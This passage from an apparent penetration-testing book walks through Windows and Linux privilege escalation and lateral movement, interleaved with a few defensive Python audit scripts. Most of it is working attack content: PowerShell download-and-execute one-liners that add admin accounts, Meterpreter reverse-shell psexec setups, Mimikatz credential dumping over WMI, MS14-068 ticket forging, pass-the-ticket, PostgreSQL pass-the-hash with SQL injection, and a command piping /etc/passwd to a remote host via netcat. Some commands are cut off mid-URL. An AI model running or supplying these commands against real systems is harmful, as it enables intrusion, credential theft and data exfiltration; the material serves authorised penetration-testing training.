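                token = token.strip().upper()
                if token and token not in INHERIT_FLAGS:
                    rights.add(token)
        aces.append((m.group("principal").strip(), rights))
    return aces


def writable_by_low_priv(aces):
    """Low-privilege principals whose ACE lets them modify the binary."""
    hits = []
    for principal, rights in aces:
        if "DENY" in rights:                        # a deny ACE grants nothing
            continue
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            hits.append(principal)
    return hits


if __name__ == "__main__":
    aces = parse_icacls(ICACLS_OUTPUT, SERVICE_EXE)
    for principal, rights in aces:
        print(f"{principal:<60} {' '.join(sorted(rights))}")
    print("writable by standard users via:", writable_by_low_priv(aces) or "nobody")
```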
e powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
Write-ServiceEXE -ServiceName omniserv -Username newaccount -Password Asdfasdfl -Verbose 


VERBOSE: Backing up 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe' to 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' 
Vulnerable Service File 


If possible, you can try to stop and start the service, but in this case, due to being a limited user, we 
need to wait for a reboot to occur. To force a reboot, we can push this command: 
e shutdown -r -f -t 0 


After a reboot, or after an administrative account stops and starts the service, a new account called 
"newaccount" with the password "Asdfasdfl" is created with administrative privileges. Just log back 
in and you are now a local admin. 


[Figure: lusrmgr showing the new user "newaccount" as a member of the Administrators group] 
PowerUp Privilege Escalation 


Removing your tracks is always important, so we need to make sure we set everything back to its 
original state after we get our admin account. Luckily again, harmj0y created a restore function to put 
the original executable back: 
e powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/PowerUp.ps1'); Restore-ServiceEXE -ServiceName omniserv 
o Restoring up 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' to 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe' 
o Removing backup binary 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' 


Option 2: 
Metasploit has released a local exploitation module called Windows Service Trusted Path Privilege 
Escalation. {15} 


The concept of this vulnerability is to look for services that have unquoted paths for the files they execute. 
In other words, if a service calls an executable like C:\Program Files\Demo File\Demo.exe and it 
doesn't properly quote the full path name, we can take advantage of this. If we look at the folder name 
from our example, Demo File\, we see that there is a space between Demo and File. Windows cannot tell 
where the program name ends, so it can either treat the path as "C:\Program Files\Demo File\Demo.exe" or, 
if there happened to be a Demo.exe file in "C:\Program Files\", execute that one with "File\Demo.exe" as its 
argument. To visualize this issue, let's look at two 
strings. The quoted string in the picture below is from the omniserv service from our prior example. 
We see that the BINARY_PATH_NAME has quotes around the executable path. However, the 
service DACoreService calls a file that is not quoted. This is where the problem stems from. 





In this example, C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe, we could create a file at 
C:\Program Files (x86)\Dragon.exe and the service would run Dragon.exe, treating the rest of the 
path as its input. To execute a file as a potential SYSTEM user, we just need to create a service executable in 
the path. Let's walk through the whole process. 


First, we need to identify if we have any Trusted Path Issues. From the Invoke-Allchecks above, we 
see that DACoreService is vulnerable to the unquoted service path vulnerability. 


e [*] Checking for unquoted service paths... 
e [*] Use 'Write-UserAddServiceBinary' to abuse 
e [+] Unquoted service path: DACoreService - C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe 
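The lookup order that makes an unquoted path dangerous can be generated directly. The Python below is an added example (not PowerUp or Metasploit code) that pulls BINARY_PATH_NAME from constructed sc qc output, lists the executables the service control manager would try in order, and flags the ones that land in a directory the auditor already knows standard users can write to. The sc qc sample, its display name and the writable-directory set are constructed assumptions for this example.

```python
import ntpath
import re

# Constructed sample of `sc qc DACoreService` output, modelled on the unquoted
# service the chapter compares against omniserv (only BINARY_PATH_NAME matters).
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DACoreService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Dragon Assistant Core Service (constructed)
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(output):
    """Pull the raw (possibly unquoted) image path out of `sc qc` output."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", output, re.MULTILINE)
    return m.group(1) if m else None


def unquoted_path_candidates(image_path):
    """Executables Windows would try, in order, for an unquoted path with spaces.

    Each space is a possible end of the program name, and ".exe" is appended
    when that prefix has no extension. A quoted path, or one without spaces,
    is unambiguous and yields [].
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)     # the real binary; later tokens are arguments
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit_service(name, image_path, writable_dirs):
    """Report the exposed locations for one service.

    `writable_dirs` is the set of directories the auditor has already
    determined standard users can create files in (e.g. from icacls).
    """
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    candidates = unquoted_path_candidates(image_path)
    exposed = [c for c in candidates[:-1]      # the last entry is the real binary
               if ntpath.dirname(c).rstrip("\\").lower() in writable]
    return {"service": name, "unquoted": bool(candidates), "exposed": exposed}


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SC_QC_OUTPUT)
    print("image path:", path)
    print("lookup order:", unquoted_path_candidates(path))
    # Assumed for the demo: C:\Program Files (x86) has been found writable.
    print(audit_service("DACoreService", path, {r"C:\Program Files (x86)"}))
```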


Let’s take advantage of it. Again, we will call: 
e powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
Write-UserAddServiceBinary -ServiceName DACoreService -Path Dragon.exe 


Now, if you have the proper privileges, move Dragon.exe to C:\Program Files (x86)\. When we get a 
reboot or when an admin stops and starts the DACoreService service, we will get a new user account 
(John) as part of the Administrators Group. 


Reboot the host: 


e shutdown -r -f -t 0 
[Figure: "net start DACoreService" followed by lusrmgr showing the newly created account] 
PowerUp - Account Creation 


Zero To Hero - Linux: 


On Linux, we run into the same issues. We are looking for files that are world-writable, SUID/SGID 
files owned by root, and misconfigurations. Two different tools to look for these privileges are 
unix-privesc-check and LinEnum. 


e https://code.google.com/p/unix-privesc-check/source/checkout 
e https://github.com/rebootuser/LinEnum 


Move this software over to the victim host and run them. 


Lastly, for a good list of Linux/Unix based privilege escalation exploits: 


e https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 


With Any Local Administrative or Domain Admin Account: 


Hopefully, in the prior chapter, you were able to gain access to a local administrative account that 
works on all of the users' machines, or maybe even a domain admin account. What are some of the 
next steps for your newly-found credentials? This section is dedicated to continually owning the 
network. 


Owning The Network With Credentials And Psexec: 


In my last book, once you had a username and password, if you wanted to get another Meterpreter 
shell on another host, you had to use psexec. The problem was that the default payload would trigger 
most AV systems, so we had to create a Meterpreter payload first using Veil and attach that. Let's 
go through that first to see what we used to do: 
e Go to Veil located in /opt/Veil and execute ./Veil 
e list and use a payload 
e set your LHOST and LPORT 
e generate using pyinstaller 
e Now go to Metasploit and use psexec with the custom payload 
o msfconsole 
o use exploit/windows/smb/psexec 
o set PAYLOAD windows/meterpreter/reverse_https 
o set LHOST [IP of My Box] 
o set LPORT 443 
o set SMBUser TestAccount 
o set SMBPass MyPassword 
o set SMBDomain fakeDomain 
o set EXE::Custom /root/veil-output/compiled/veil_file.exe 
o set RHOST [IP of Remote Host] 


This worked great in the past and we were able to get around AV. However, I have seen some AV 
in the past year start picking up on Python executable payloads. As seen throughout the book, this is 
definitely a cat and mouse game. That is what makes penetration testing so much fun. 


This is where psexec_psh comes into play. Just like psexec, psexec_psh mimics the 
Sysinternals tool psexec to log into the victim host and execute a payload. What psexec_psh does 
differently is use PowerShell encoded commands instead of an uploaded service binary. You will get back a 
Meterpreter shell, but this time nothing will touch disk at all. No need to create a custom payload to 
evade AV. 


e use exploit/windows/smb/psexec_psh 
e set RHOST 172.16.151.202 
e set SMBUser lab 
e set SMBPass '!Asdfasdfasdfl!' 
e set SMBDomain hacker.testlab 
e set LHOST 172.16.151.141 
e set PAYLOAD windows/meterpreter/reverse_https 
e exploit 


[Figure: psexec_psh options being set, the reverse HTTPS handler starting on 172.16.151.141, the payload executing and a Meterpreter session opening] 
psexec_psh 
Now moving laterally through the network becomes that much easier and that much more silent. 


Once we have a successful Meterpreter session, we will interact with that session with the command: 
e sessions -i [session number] 


One of the common next steps is to run Mimikatz against the system. If you run into a system that is a 
64-bit system, you will have to first migrate into a 64-bit process. The reason I want to utilize a 64- 
bit process is because that is the only way Mimikatz will be able to look for the clear text passwords 
in 64-bit systems. If it is a 32-bit system, you can still migrate into another process if needed, but it 
might not be necessary. 


To list all of the processes, we will use the "ps" command. To migrate, we will use the command 
"migrate [pid]". In the example below, we identified Notepad running as a 64-bit process and 
migrated into it. 

e ps 

e migrate [pid of an x86_64 process] 


You might need to become "system" before doing any of these commands. You can do this by issuing 
the following command: 

e getsystem 

e If you get denied and are a local admin, see the Bypass UAC section. 


Once migrated and running as SYSTEM, we want to load Mimikatz and type the command kerberos (or 
you can use wdigest). This should give us the clear text passwords of the users currently logged in. 
e kerberos 
e wdigest 


[Figure: process list, "migrate 3040" into a 64-bit process, and Mimikatz output listing fakeDomain credentials] 
Mimikatz 





We now have another account and password to utilize. In addition to Mimikatz, there are also other 
post modules in Metasploit that you might want to look into, such as Incognito {16} and 
Smart_HashDump {17}. These should get you enough access on this host for the time being. 


Psexec Commands Across Multiple IPs (Kali Linux) 


Since we have credentials that have local administrative access, there are times where I don't want to 
compromise every host, and instead, just run commands on these hosts. For example, some commands 
you may want to run on all hosts are: 
e net group "Domain Admins" /domain (list all Domain Admins on servers) 
e qwinsta (list user session information) 
e Create Additional Administrative Accounts on All Hosts 
o net user username password /ADD /DOMAIN 
o net group "Domain Admins" username /ADD /DOMAIN 
o net localgroup Administrators username /ADD 


Royce Davis took the original psexec code and modified it so it does not upload any binaries, but 
achieves command line remote code execution in memory. This allows you to avoid AV detection and 
run threaded commands on multiple systems. I will show you a quick example: {18} 
e use auxiliary/admin/smb/psexec_command 
e set RHOSTS [IP or IP Range] 
e set SMBDomain [Domain Info] 
e set SMBPass [Password] 
e set SMBUser [User] 
e set COMMAND [command you want to run at the command line] 
e exploit 


[Figure: psexec_command run against 172.16.139.196 with COMMAND qwinsta; the output shows an active console session for administrator, then cleanup completing] 
psexec_command 





In the Pregame chapter, during the Setting Up Your Box phase, you had the option of enabling logging 
for Metasploit. This is one area where logging can be very helpful. If you want to execute code on a /24 
network or larger, the output is going to be pretty extensive. If you need to parse through it, it is much 
easier to have Metasploit log the traffic and grep that file. In the previous command, I was able to run 
the qwinsta command on every host and link IPs with usernames. If I have a list of IT administrators, I 
can directly attack their box instead of compromising all the hosts on the network. 
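Rather than grepping the Metasploit log by hand, the Python below (an added example, not a Metasploit feature) parses a constructed excerpt of psexec_command output running qwinsta against two hosts, uses the qwinsta header's column offsets so usernames containing spaces survive, and maps each host to its logged-on users. The log excerpt and the host addresses are constructed for the example.

```python
import re

# Constructed excerpt of a Metasploit console log from auxiliary/admin/smb/psexec_command
# run with COMMAND qwinsta against two hosts, in the format the chapter's screenshot shows.
MSF_LOG = """\
[*] 172.16.139.196:445 - Executing the command...
[*] 172.16.139.196:445 - Getting the command output...
[*] 172.16.139.196:445 - Command completed successfully! Output:
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           administrator             1  Active
[*] 172.16.139.196:445 - Executing cleanup...
[*] 172.16.139.196:445 - Cleanup was successful
[*] 172.16.139.197:445 - Executing the command...
[*] 172.16.139.197:445 - Getting the command output...
[*] 172.16.139.197:445 - Command completed successfully! Output:
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console                                     1  Conn
 rdp-tcp#0         bobsmith                  2  Active  rdpwd
[*] 172.16.139.197:445 - Executing cleanup...
[*] 172.16.139.197:445 - Cleanup was successful
[*] Scanned 2 of 2 hosts (100% complete)
"""

# Metasploit status line carrying the peer address: "[*] 1.2.3.4:445 - message".
HOST_LINE = re.compile(r"^\[[*+\-!]\]\s+(\d{1,3}(?:\.\d{1,3}){3}):\d+\s+-\s+(.*)$")
COLUMNS = ("SESSIONNAME", "USERNAME", "ID", "STATE")


def parse_qwinsta_log(log):
    """Return {host: [{"session", "user", "state"}, ...]} for each qwinsta block."""
    sessions, host, cols = {}, None, None
    for line in log.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host, message = m.groups()
            cols = None                          # a status line ends any output block
            if message.endswith("Output:"):
                sessions.setdefault(host, [])
            continue
        if host is None or not line.strip():
            continue
        if all(c in line for c in COLUMNS):      # qwinsta header: record column offsets
            cols = {c: line.index(c) for c in COLUMNS}
            continue
        if cols is None:
            continue                             # text outside a qwinsta block
        # Fixed-width slicing keeps usernames that contain spaces intact.
        user = line[cols["USERNAME"]:cols["ID"]].strip()
        if not user:
            continue                             # services/listener rows have no user
        state_field = line[cols["STATE"]:].strip()
        sessions.setdefault(host, []).append({
            "session": line[cols["SESSIONNAME"]:cols["USERNAME"]].strip().lstrip(">"),
            "user": user,
            "state": state_field.split()[0] if state_field else "",
        })
    return sessions


def hosts_for_user(sessions, username):
    """Hosts on which `username` had a session (case-insensitive), sorted."""
    username = username.lower()
    return sorted(h for h, rows in sessions.items()
                  if any(r["user"].lower() == username for r in rows))


if __name__ == "__main__":
    found = parse_qwinsta_log(MSF_LOG)
    for host, rows in found.items():
        for r in rows:
            print(f"{host:<16} {r['session']:<12} {r['user']:<20} {r['state']}")
    print("administrator seen on:", hosts_for_user(found, "administrator"))
```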


Move Laterally With WMI (Windows) 


A better option to move laterally is using WMI, or Windows Management Instrumentation. WMI is 
used to manage systems and is installed by default on all new Windows operating systems. We can 
take advantage of WMI to remotely execute commands on other systems to which we have access. 
Since we have compromised our victim and pulled hashes, we can now find an account with elevated 
privileges and run commands on remote hosts using those credentials. In the example below, we 
compromised a user "testuser1" that has access to another host. We can use WMI to execute Mimikatz 
remotely, write it out to a file in the public folder, and read that file: 


e wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdfl!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc
Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 
e dir \\win8\c$\Users\Public\ 
e type \\win8\c$\Users\Public\a.txt 
e del \\win8\c$\Users\Public\a.txt 


As you can see from the image below, we are currently on the host win7. We execute a wmic call to 
remotely execute a PowerShell script against the host win8 to run Mimikatz and dump it out to a file. 
Next, we will read that file from our win7 host. 


[Figure: the wmic call from win7 executing Invoke-Mimikatz on win8, and the Mimikatz output read back from \\win8\c$\Users\Public\a.txt] 
Remote PowerShell Execution with WMI 


This is done all remotely in memory without any executables being run. 
So is there a better way to do all this? harmj0y created a MassMimikatz tool that, for the most part, 
does the same thing. {19} Let's take a look at this. 


MassMimikatz will first start up a web server to host the Mimikatz code. This is why we are going to set 
a FireWallRule with the switch parameter. Next, the script will use WMI to execute PowerShell scripts 
on the hosts using the cached credentials on each system, and store the results in a folder called 
MimikatzOutput. Let's see this in action against a few win7 and win8 systems. 
e Powershell.exe -NoP -NonI -Exec Bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
MassMimikatz.ps1'); 'win7','win8' | Invoke-MassMimikatz -Verbose -FireWallRule" 


[Figure: Invoke-MassMimikatz verbose output: setting the inbound firewall rule for port 8888, executing on win7 and win8, waiting for the commands to trigger, parsing the MimikatzOutput folder and listing the recovered credentials for testuser1 and lab, then removing the rule and killing the web server] 
MassMimikatz 


We don’t need to worry about password cracking at all, as we will use the speed and efficiency of 
MassMimikatz to pull clear text passwords. 


Kerberos - MS14-068: 


Kerberos had a lot of large vulnerabilities in the past couple of years. One of the biggest 
vulnerabilities was MS14-068. This gave any domain user the ability to escalate privileges to domain 
administrator. If you don't have a great understanding of Kerberos yet, this would be a great time to 
get a refresher. If you do have a good understanding of Kerberos, keep moving forward. 


As we know, Kerberos is used for authentication and authorization. The underlying issue is that the 
Privilege Attribute Certificate (PAC), which stores information such as account name, ID, and group 
membership information, can be forged. This means that, with some basic information on a domain 
user, you have the ability to move to domain administrator. 


e git clone https://github.com/bidord/pykek /opt/pykek/ 
e apt-get install krb5-user 

e apt-get install rdate 

e rdate -n [Domain] 

e echo 172.16.151.200 dc.hacker.testlab >> /etc/hosts 


We are going to need to know four pieces of information: 
e -u username@domain [example: limiteduser@hacker.testlab] 
e -d domain controller [example: dc.hacker.testlab] 
e -p password 
e -s SID [example: S-1-5-21-3525058729-1821581466-2040179600-1111] 


We should have all the information except for the SID. To get the SID, just run this command as any 
limited user account: 
e whoami /user 


C:\Users\limiteduser>whoami /user 

USER INFORMATION 
---------------- 

User Name           SID 
=================== ============================================== 
hacker\limiteduser  S-1-5-21-3525058729-1821581466-2040179600-1111 

Retrieving SID information with Whoami 


Now that we have all the pieces we need: 
e cd /opt/pykek/ 
e python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21-3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdfl!' 





[Figure: ms14-068.py run from /opt/pykek against dc.hacker.testlab, writing TGT_limiteduser@hacker.testlab.ccache] 
Creating the ccache Kerberos File 


We now have a credential cache ticket generated; to use it, we copy it to /tmp/krb5cc_0: 
e cp TGT_limiteduser@hacker.testlab.ccache /tmp/krb5cc_0 

You can now access the host using: 
e smbclient -k -W hacker.testlab //dc.hacker.testlab/c$ 


The other option is to push the credential cache ticket and the mimikatz executable to the victim host 
and run: 
e mimikatz.exe "kerberos::ptc TGT_limiteduser@hacker.testlab.ccache" exit 


You are able to do a dir \\dc\c$ and have full access to the victim host. 


More info: 




Pass-The-Ticket 


We should all be pretty familiar with Pass-the-Hash attacks from the previous book and this book as 
well. With all the Kerberos attacks, it is possible to pass Kerberos tickets as well. Let’s walk through 
an example of stealing Kerberos authentication tickets to impersonate users throughout the network. 


C:\mimikatz_trunk\x64>dir \\dc\ 
Access is denied. 

C:\mimikatz_trunk\x64>mimikatz 
mimikatz 2.0 alpha (x64) release "Kiwi en C" (Jan 22 2015 22:16:09) 
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
http://blog.gentilkiwi.com/mimikatz 
with 15 modules 

mimikatz # privilege::debug 
Privilege '20' OK 

mimikatz # sekurlsa::tickets /export 

Authentication Id : 0 ; 307551 (00000000:0004b15f) 
Session           : Interactive from 1 
User Name         : testuser1 
Domain            : HACKER 
SID               : S-1-5-21-3525058729-1821581466-2040179600-1106 

Kerberos Tickets 


e privilege::debug 
e sekurlsa::tickets /export 


The export command will write all of the Kerberos tickets to the folder from which it was executed. 
In the example below, we see the user account “lab” that we recovered. We know from the start that 
“lab” was a domain administrative account. 


[Figure: Mimikatz ticket export listing Group 2 - Ticket Granting Service tickets for client lab @ HACKER.TESTLAB (ldap, LDAP and HOST services on dc.hacker.testlab), each saved to a .kirbi file] 
Kerberos Tickets 


If we look in the same folder, we see a Kerberos krbtgt ticket for the user account lab. We need to 
import that as one of our Kerberos tickets. Then, drop back into Mimikatz: 
• kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 





   * Saved to file [0;3e7]-2-1-40e10000-WIN7$@krbtgt-HACKER.TESTLAB.kirbi ! 

mimikatz # kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 
* File: '[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi': OK 

C:\mimikatz_trunk\x64>dir \\dc\c$ 
 Volume in drive \\dc\c$ has no label. 
 Volume Serial Number is [not legible in the source] 

 PerfLogs 
 Program Files 
 Program Files (x86) 
 [remaining entries not legible in the source] 
 21,404,258,304 bytes free 

Exported .kirbi files in the working directory: 
[0;4b114]-0-1-40a50000-testuser1@ldap-dc.hacker.testlab.kirbi 
[0;4b114]-0-2-40a50000-testuser1@LDAP-DC.hacker.testlab.kirbi 
[0;4b114]-2-0-60a10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi 
[0;4b114]-2-1-40e10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi 
[0;ab9bf]-0-1-40a50000-lab@LDAP-DC.hacker.testlab.kirbi 
[0;ab9bf]-0-2-40a50000-lab@HOST-DC.hacker.testlab.kirbi 
[0;ab9bf]-2-0-60a10000-lab@krbtgt-HACKER.TESTLAB.kirbi 
[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 

Kerberos - Pass-the-Ticket 


Once we drop out of Mimikatz, we can do a directory listing on the domain controller and get a 
listing. We now have a Kerberos ticket as a domain administrative account. 


Lateral Movement With PostgreSQL 


I love lateral movement as it takes creativity and an understanding of how exactly technologies work. 
PostgreSQL v9.5 and earlier (remember that most orgs I have encountered do not regularly 
patch PostgreSQL) carry a vulnerability that allows pass-the-hash authentication. It was 
originally found by Jens Steube and Philipp Schmidt and lets an attacker authenticate to 
PostgreSQL databases that use challenge-response authentication with the AUTH_REQ_MD5 
method, which is what you get by simply configuring "md5" as the method in the Host Based Authentication (HBA) file pg_hba.conf. {21} 


Here is their amazing paper on how they discovered that, during the authentication process, the actual 
password is never checked; the value the server compares is derived from the stored hash, so the hash alone is enough to log in: 


https://hashcat.net/misc/postgres-pth/postgres-pth.pdf. 


Let's say you are on an internal penetration test, and you used SQLMap or a similar tool to identify an 
SQL injection on a web page that utilizes a PostgreSQL backend. It might look something like: 
• http://postgres.suck.testlab/search.php?search=weapons' union select null,concat(usename,passwd) FROM pg_shadow-- 
• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 


The result will be a list of hashes of all the users: 
• postgres,md532e121215ba27cb750c9e093ce4b5127 
• secretlogin,md598d21549d6420160b54f7898a7ff60cc 
• john,md5cbfaf1e32c711ee7ba63b5b6518a777b 
• test,md505a671c66aefea124cc08b76ea6d30bb 


We could spend time dropping it in oclhashcat and trying to crack the passwords, but due to the PTH 
issues, we can actually connect to all the other postgresql servers with just the hash. Let's walk 
through how this is done. We are going to pull a copy of postgresql onto our box, download the patch, 
apply the patch, and configure and install our modified version of psql. Psql is just an interactive 
terminal to connect to postgres. With our modified version, we can now supply hashes instead of 
passwords. 


I tested this with Postgres commit a2e35b53c39b2a27d3e332dc7c506539c306fd44: 
• wget https://github.com/postgres/postgres/archive/a2e35b53c39b2a27d3e332dc7c506539c306fd44.zip && unzip a2e35b53c39b2a27d3e332dc7c506539c306fd44.zip -d /opt/ && mv /opt/postgres-a2e35b53c39b2a27d3e332dc7c506539c306fd44 /opt/postgresql && cd /opt/postgresql/ 
• wget https://hashcat.net/misc/postgres-pth/postgresql_diff_clean.txt 
• git apply postgresql_diff_clean.txt 
• ./configure 
• make && make install 
• cd /usr/local/pgsql/bin/ 
• ./psql -h [IP of PostgreSQL server] -U postgres 
• Supply the hash of the postgres user when prompted 


But why stop there? To show you what you can do once you are logged in as the privileged Postgres 
user, we will read the /etc/passwd file. 

• CREATE TABLE mydata(t text); 
• COPY mydata FROM '/etc/passwd'; 
• SELECT t FROM mydata LIMIT 5 OFFSET 1; 


root@kali:/usr/local/pgsql/bin# ./psql -h [IP of PostgreSQL server] -U postgres 
Hash for user postgres: md532e121215ba27cb750c9e093ce4b5127 
psql (9.5devel, server 9.1.13) 
Type "help" for help. 

postgres=# CREATE TABLE mydata(t text); 
CREATE TABLE 
postgres=# COPY mydata FROM '/etc/passwd'; 
COPY 44 
postgres=# SELECT t FROM mydata LIMIT 5 OFFSET 1; 
[query output not legible in the source] 

Pass-the-Hash with PostgreSQL 


We can also run command shells to fully compromise the host. 

• CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv 
• SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv 
• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 
If you want to run this exercise in a controlled environment, the version installed on Kali Linux 
(before any updates) should be vulnerable as long as it is older than v9.5. If it is not, you will have to 
uninstall PostgreSQL before installing the vulnerable version. Once installed, create a new user (in 
this case “thp”), create a database, and print out the hash: 
• sudo -u postgres psql 
• create user thp createdb createuser password 'thp'; 
• create database thp owner thp; 
• select usename, passwd FROM pg_shadow; 
• Grab the created hash password for the “thp” user 
• Run the example above, but instead of the user “postgres” use “thp” 
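To make the property the paper describes concrete from the defender's side, here is an added Python example (my own code, not the book's, the hashcat team's or PostgreSQL's). It derives the AUTH_REQ_MD5 client response twice, once from the password and once from the pg_shadow hash alone, which is exactly why the hash is login-equivalent, and it audits a constructed pg_hba.conf for network rules that still allow that method. The sample configuration, the role name and the salt are constructed; the derivation follows the documented md5 scheme.

```python
"""PostgreSQL 'md5' authentication is hash-equivalent: a worked check plus a pg_hba.conf audit.

Added example for this section. It is not code from the book or from the
hashcat paper; it reproduces the documented AUTH_REQ_MD5 derivation in
Python so the pass-the-hash property can be verified offline, and audits a
constructed pg_hba.conf for rules that still rely on it.
"""
import hashlib
import re
from typing import List

# Methods that accept a stolen pg_shadow value (md5) or the secret itself (password, trust).
WEAK_METHODS = {"md5", "password", "trust"}
_NETMASK = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def pg_md5_stored(username: str, password: str) -> str:
    """pg_shadow.passwd for an md5 role: 'md5' + hex(md5(password || username))."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def pg_md5_response_from_password(username: str, password: str, salt: bytes) -> str:
    """What a legitimate client answers to AUTH_REQ_MD5: 'md5' + hex(md5(inner_hex || salt))."""
    inner_hex = hashlib.md5((password + username).encode()).hexdigest()
    return "md5" + hashlib.md5(inner_hex.encode() + salt).hexdigest()


def pg_md5_response_from_stored(stored: str, salt: bytes) -> str:
    """The identical answer computed from the pg_shadow value alone.

    The password never enters this function: whoever can read pg_shadow
    (for example through the SQL injection described above) can answer the
    server's challenge for every role without cracking a single hash.
    """
    if not stored.startswith("md5") or len(stored) != 35:
        raise ValueError("not an md5-style pg_shadow entry")
    return "md5" + hashlib.md5(stored[3:].encode() + salt).hexdigest()


def audit_pg_hba(text: str) -> List[str]:
    """One finding per network (host*) rule in pg_hba.conf that uses a weak method."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local" or len(fields) < 5:
            continue  # Unix-socket rules carry no network challenge/response
        # host rows: TYPE DATABASE USER ADDRESS [NETMASK] METHOD [OPTIONS]
        rest = fields[4:]
        method = rest[1] if _NETMASK.match(rest[0]) and len(rest) > 1 else rest[0]
        if method in WEAK_METHODS:
            findings.append(
                f"line {lineno}: {fields[0]} rule for {fields[3]} uses '{method}'; "
                "use scram-sha-256 (password_encryption = scram-sha-256, then re-set passwords)"
            )
    return findings


# Constructed sample configuration, not taken from any real server.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS              METHOD
local   all       all                        peer
host    all       all   127.0.0.1/32         md5
host    all       all   10.0.0.0/8           md5
host    all       all   10.0.0.0 255.0.0.0   trust
hostssl all       all   192.168.1.0/24       scram-sha-256
"""

if __name__ == "__main__":
    salt = b"\x9a\x01\x7f\x22"  # constructed 4-byte server salt
    stored = pg_md5_stored("thp", "thp")
    print("pg_shadow entry :", stored)
    print("from password   :", pg_md5_response_from_password("thp", "thp", salt))
    print("from hash only  :", pg_md5_response_from_stored(stored, salt))
    for finding in audit_pg_hba(SAMPLE_PG_HBA):
        print(finding)
```

The two response functions return the same value for the same salt, which is the whole finding in one line: the server can only ever compare a function of the stored hash. Moving the affected rules to scram-sha-256 closes it because SCRAM binds the proof to a per-connection nonce and a client-side iterated key rather than to the stored verifier.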


Pulling Cached Credentials 


Did you ever try to log onto your laptop while you weren't on the network? How can you authenticate 
without being connected to the domain? It is because Windows stores the last ten users with 
successful logins by default. If we can dump this, this is another way to find additional credentials. 
We won't be able to pull these passwords in clear text, so we will have to try to crack these 
credentials. 


What types of users might you see? Of course the user of the laptop, but you will usually also find an 
account like “helpdesk” or similar, as they originally set up the machine. In the next example, we will 
assume you already have a Meterpreter shell on the victim host and we will use Metasploit's 
cachedump module to pull these creds. 





• use post/windows/gather/cachedump 
• set SESSION 1 
• show options 
• exploit 
[*] Executing module against win7 
[*] Cached Credentials Setting: - (Max is 50 and 0 disables, and 10 is default) 
[*] Obtaining boot key... 
[*] Obtaining Lsa key... 
[*] Vista or above system 
[*] Obtaining LK$KM... 
[*] Dumping cached credentials... 
[*] Hash are in MSCACHE_VISTA format. (mscash2) 
[*] MSCACHE v2 saved in: /root/.msf4/loot/20150128134030_default_192.168.199.1_mscache2.creds_209900.txt 
[*] John the Ripper format: 
# mscash2 
domainadmin:$DCC2$10240#domainadmin#06198c06198c06198c06198c06198c9:HACKER.TESTLAB 


To crack in oclHashcat, if the hash is in a file, the proper format is: 
$DCC2$10240#account_name#hash 


Although using faster GPUs helps, the major problem with cached credentials is that they are very 
slow to crack. Attacking cached credentials is usually an approach that you might take if you can't 
move laterally or need to crack in the background while you continue to attack. Let’s look at the 
oclHashcat command: 

